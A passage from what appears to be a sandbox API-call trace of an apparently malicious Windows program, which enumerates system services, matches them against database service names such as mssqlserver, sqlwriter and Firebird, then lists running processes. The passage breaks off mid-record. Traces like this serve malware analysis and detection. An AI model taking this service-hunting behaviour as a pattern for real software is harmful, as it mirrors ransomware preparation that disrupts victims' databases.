lpString2="Audiosrv") returned 1 [0311.839] lstrlenW (lpString="BFE") returned 3 [0311.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0311.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0311.840] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0311.840] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0311.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0311.840] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0311.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0311.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0311.840] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0311.840] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0311.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0311.840] lstrlenW (lpString="CDPSvc") returned 6 [0311.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0311.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0311.840] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0311.840] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0311.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0311.840] lstrlenW (lpString="ClickToRunSvc") returned 13 [0311.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0311.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0311.840] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0311.840] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0311.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0311.840] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0311.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0311.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0311.840] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0311.840] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0311.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0311.840] lstrlenW (lpString="CryptSvc") returned 8 [0311.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0311.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0311.841] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0311.841] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0311.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0311.841] lstrlenW (lpString="DcomLaunch") returned 10 [0311.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0311.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0311.841] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0311.841] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0311.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0311.841] lstrlenW (lpString="DeviceAssociationService") returned 24 [0311.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0311.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0311.841] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0311.841] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0311.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0311.841] lstrlenW (lpString="Dhcp") returned 4 [0311.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0311.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0311.841] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0311.841] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0311.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0311.841] lstrlenW (lpString="Dnscache") returned 8 [0311.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0311.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0311.842] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0311.842] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0311.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0311.842] lstrlenW (lpString="DPS") returned 3 [0311.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0311.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0311.842] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0311.842] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0311.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0311.842] lstrlenW (lpString="DusmSvc") returned 7 [0311.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0311.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0311.842] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0311.842] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0311.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0311.842] lstrlenW (lpString="EventLog") returned 8 [0311.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0311.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0311.842] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0311.842] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0311.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0311.842] lstrlenW (lpString="EventSystem") returned 11 [0311.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0311.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0311.842] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0311.842] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0311.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0311.842] lstrlenW (lpString="FontCache") returned 9 [0311.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0311.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0311.842] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0311.843] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0311.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0311.843] lstrlenW (lpString="gpsvc") returned 5 [0311.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0311.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0311.843] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0311.843] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0311.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0311.843] lstrlenW (lpString="iphlpsvc") returned 8 [0311.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0311.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0311.843] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0311.843] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0311.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0311.843] lstrlenW (lpString="KeyIso") returned 6 [0311.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0311.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0311.843] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0311.843] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0311.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0311.843] lstrlenW (lpString="LanmanServer") returned 12 [0311.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0311.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0311.843] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0311.843] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0311.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0311.843] lstrlenW (lpString="LanmanWorkstation") returned 17 [0311.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0311.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0311.843] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0311.844] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0311.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0311.844] lstrlenW (lpString="lfsvc") returned 5 [0311.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0311.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0311.844] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0311.844] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0311.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0311.844] lstrlenW (lpString="lmhosts") returned 7 [0311.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0311.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0311.844] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0311.844] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0311.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0311.844] lstrlenW (lpString="LSM") returned 3 [0311.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0311.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0311.844] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0311.844] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0311.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0311.844] lstrlenW (lpString="MpsSvc") returned 6 [0311.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0311.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0311.844] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0311.844] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0311.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0311.844] lstrlenW (lpString="NcbService") returned 10 [0311.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0311.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0311.844] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0311.845] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0311.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0311.845] lstrlenW (lpString="netprofm") returned 8 [0311.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0311.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0311.845] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0311.845] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0311.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0311.845] lstrlenW (lpString="NgcSvc") returned 6 [0311.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0311.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0311.845] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0311.845] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0311.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0311.845] lstrlenW (lpString="NlaSvc") returned 6 [0311.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0311.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0311.845] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0311.845] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0311.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0311.845] lstrlenW (lpString="nsi") returned 3 [0311.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0311.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0311.845] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0311.845] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0311.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0311.845] lstrlenW (lpString="PcaSvc") returned 6 [0311.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0311.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0311.845] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0311.845] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0311.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0311.846] lstrlenW (lpString="PlugPlay") returned 8 [0311.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0311.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0311.846] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0311.846] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0311.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0311.846] lstrlenW (lpString="Power") returned 5 [0311.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0311.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0311.846] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0311.846] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0311.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0311.846] lstrlenW (lpString="ProfSvc") returned 7 [0311.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0311.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0311.846] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0311.846] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0311.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0311.846] lstrlenW (lpString="RpcEptMapper") returned 12 [0311.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0311.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0311.846] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0311.846] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0311.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0311.846] lstrlenW (lpString="RpcSs") returned 5 [0311.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0311.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0311.846] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0311.846] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0311.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0311.847] lstrlenW (lpString="SamSs") returned 5 [0311.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0311.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0311.847] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0311.847] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0311.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0311.847] lstrlenW (lpString="Schedule") returned 8 [0311.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0311.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0311.847] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0311.847] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0311.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0311.847] lstrlenW (lpString="SecurityHealthService") returned 21 [0311.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0311.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0311.847] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0311.847] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0311.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0311.847] lstrlenW (lpString="SENS") returned 4 [0311.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0311.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0311.847] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0311.847] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0311.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0311.847] lstrlenW (lpString="ShellHWDetection") returned 16 [0311.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0311.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0311.847] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0311.847] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0311.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0311.848] lstrlenW (lpString="Spooler") returned 7 [0311.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0311.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0311.848] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0311.848] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0311.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0311.848] lstrlenW (lpString="StateRepository") returned 15 [0311.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0311.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0311.888] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0311.888] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0311.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0311.888] lstrlenW (lpString="SysMain") returned 7 [0311.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0311.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0311.888] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0311.888] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0311.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0311.888] lstrlenW (lpString="SystemEventsBroker") returned 18 [0312.180] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0312.180] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0312.180] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0312.181] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0312.181] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0312.181] lstrlenW (lpString="Themes") returned 6 [0312.181] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0312.181] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0312.181] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0312.181] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0312.181] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0312.181] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0312.181] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0312.181] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0312.181] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0312.181] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0312.181] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4150d60 | out: hHeap=0x470000) returned 1 [0312.182] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x54c [0312.193] Process32FirstW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0312.194] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0312.195] lstrlenW (lpString="System") returned 6 [0312.195] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0312.196] lstrlenW (lpString="smss.exe") returned 8 [0312.196] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0312.197] lstrlenW (lpString="csrss.exe") returned 9 [0312.197] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0312.197] lstrlenW (lpString="wininit.exe") returned 11 [0312.197] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0312.198] lstrlenW (lpString="csrss.exe") returned 9 [0312.198] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0312.199] lstrlenW (lpString="winlogon.exe") returned 12 [0312.199] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0312.199] lstrlenW (lpString="services.exe") returned 12 [0312.199] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0312.200] lstrlenW (lpString="lsass.exe") returned 9 [0312.200] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0312.201] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0312.201] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0312.202] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0312.202] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.202] lstrlenW (lpString="svchost.exe") returned 11 [0312.202] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, 